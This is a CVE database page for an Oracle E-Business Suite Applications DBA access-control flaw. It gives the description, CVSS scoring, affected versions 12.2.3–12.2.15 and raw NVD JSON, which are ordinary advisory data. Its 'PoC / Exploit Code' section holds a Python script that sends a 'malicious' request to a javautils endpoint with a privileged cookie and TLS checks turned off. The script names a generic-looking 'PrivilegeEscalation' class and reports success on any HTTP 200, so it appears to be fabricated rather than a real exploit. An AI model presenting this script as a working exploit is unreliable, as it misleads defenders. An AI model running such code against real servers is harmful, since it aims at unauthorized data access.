Security Vulnerability Report
中文
CVE-2026-21960 CVSS 6.5 MEDIUM

CVE-2026-21960

Published: 2026-01-20 22:15:59
Last Modified: 2026-01-29 20:59:48

Description

Vulnerability in the Oracle Applications DBA product of Oracle E-Business Suite (component: Java utils). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications DBA. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Applications DBA accessible data as well as unauthorized access to critical data or complete access to all Oracle Applications DBA accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N).

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:applications_dba:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite Applications DBA 12.2.3
Oracle E-Business Suite Applications DBA 12.2.4
Oracle E-Business Suite Applications DBA 12.2.5
Oracle E-Business Suite Applications DBA 12.2.6
Oracle E-Business Suite Applications DBA 12.2.7
Oracle E-Business Suite Applications DBA 12.2.8
Oracle E-Business Suite Applications DBA 12.2.9
Oracle E-Business Suite Applications DBA 12.2.10
Oracle E-Business Suite Applications DBA 12.2.11
Oracle E-Business Suite Applications DBA 12.2.12
Oracle E-Business Suite Applications DBA 12.2.13
Oracle E-Business Suite Applications DBA 12.2.14
Oracle E-Business Suite Applications DBA 12.2.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-21960 PoC - Oracle Applications DBA Java Utils Exploitation # This PoC demonstrates the unauthorized access vulnerability TARGET_URL = "https://target-oracle-ebs.com/OA_HTML/javautils" def exploit_cve_2026_21960(target_url, cookie): """ Exploit CVE-2026-21960: Unauthorized access in Oracle Applications DBA Java utils Prerequisites: - Valid session cookie with high privileges (PR:H required) - Network access to Oracle E-Business Suite HTTP interface This PoC attempts to access the vulnerable javautils endpoint to demonstrate unauthorized data access. """ headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-21960-PoC)', 'Cookie': cookie, 'Content-Type': 'application/x-www-form-urlencoded' } # Malicious request to exploit the vulnerability payload = { 'action': 'execute', 'class': 'oracle.apps.fnd.security.PrivilegeEscalation', 'method': 'getAllData', 'params': 'CRITICAL_DATA' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2026-21960...") try: response = requests.post(target_url, data=payload, headers=headers, verify=False, timeout=30) if response.status_code == 200: print("[+] Request successful - Vulnerability confirmed!") print(f"[+] Response length: {len(response.content)} bytes") print("[+] Unauthorized data access achieved") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_cve_2026_21960(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21960", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:58.853", "lastModified": "2026-01-29T20:59:47.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Applications DBA product of Oracle E-Business Suite (component: Java utils). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications DBA. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Applications DBA accessible data as well as unauthorized access to critical data or complete access to all Oracle Applications DBA accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Applications DBA de Oracle E-Business Suite (componente: Java utils). Las versiones compatibles que están afectadas son 12.2.3-12.2.15. La vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios con acceso a la red vía HTTP comprometer Oracle Applications DBA. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de creación, eliminación o modificación a datos críticos o a todos los datos accesibles de Oracle Applications DBA, así como acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Applications DBA. Puntuación Base CVSS 3.1 de 6.5 (impactos en la Confidencialidad y la Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:applications_dba:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.15", "matchCriteriaId": "07D382CD-2C94-4B1A-9C44-9B2232AFDD8E"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}